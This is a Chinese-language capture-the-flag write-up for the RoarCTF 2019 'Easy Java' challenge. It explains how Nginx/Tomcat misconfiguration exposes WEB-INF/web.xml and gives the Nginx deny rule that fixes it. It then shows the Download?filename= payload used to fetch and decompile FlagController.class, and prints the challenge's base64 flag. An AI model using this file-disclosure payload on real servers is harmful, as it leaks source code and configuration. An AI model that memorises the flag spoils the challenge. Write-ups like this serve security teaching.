web-[RoarCTF 2019]Easy Java

题目要点

• WEB-INF/web.xml泄露

WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet和其他的应用组件配置及命名规则。 /WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class和非servlet class，他们不能包含在 .jar文件中

/WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/：源码目录，按照包名结构放置各个java文件。
/WEB-INF/database.properties：数据库配置文件
漏洞检测以及利用方法：通过找到web.xml文件，推断class文件的路径，最后直接class文件，在通过反编译class文件，得到网站源码

• 漏洞成因：

通常一些web应用我们会使用多个web服务器搭配使用，解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候，由于对静态资源的目录或文件的映射配置不当，可能会引发一些的安全问题，导致web.xml等文件能够被读取。漏洞检测以及利用方法：通过找到web.xml文件，推断class文件的路径，最后直接class文件，在通过反编译class文件，得到网站源码。一般情况，jsp引擎默认都是禁止访问WEB-INF目录的，Nginx配合Tomcat做均衡负载或集群等情况时，问题原因其实很简单， Nginx不会去考虑配置其他类型引擎（Nginx不是jsp引擎） 导致的安全问题而引入到自身的安全规范中来（这样耦合性太高了），修改Nginx配置文件禁止访问WEB-INF目录就好了：location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他！

题目内容

解题

点击help跳转。

这里可以看到url里含有 /Download?filename=help.docx 推测为下载文件。
抓包修改上传方式为POST

得到web.xml文件。
上面也说了要根据web.xml推断出class文件的位置。再进行反编译得到源码。
构造payload：

/Download?filename=WEB-INF/classes/com/wm/ctf/FlagController.class

得到class文件，反编译得到源码。

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(name = "FlagController")
public class FlagController extends HttpServlet {
  String flag = "ZmxhZ3sxZDU2ODJmYS1kZTJlLTRjNjctOTVmYy0xZDRmYWM2ZGQ1MmJ9Cg==";
  
  protected void doGet(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse) throws ServletException, IOException {
    PrintWriter printWriter = paramHttpServletResponse.getWriter();
    printWriter.print("
Flag is nearby ~ Come on! ! !
");
  }
}

base64解码得到flag。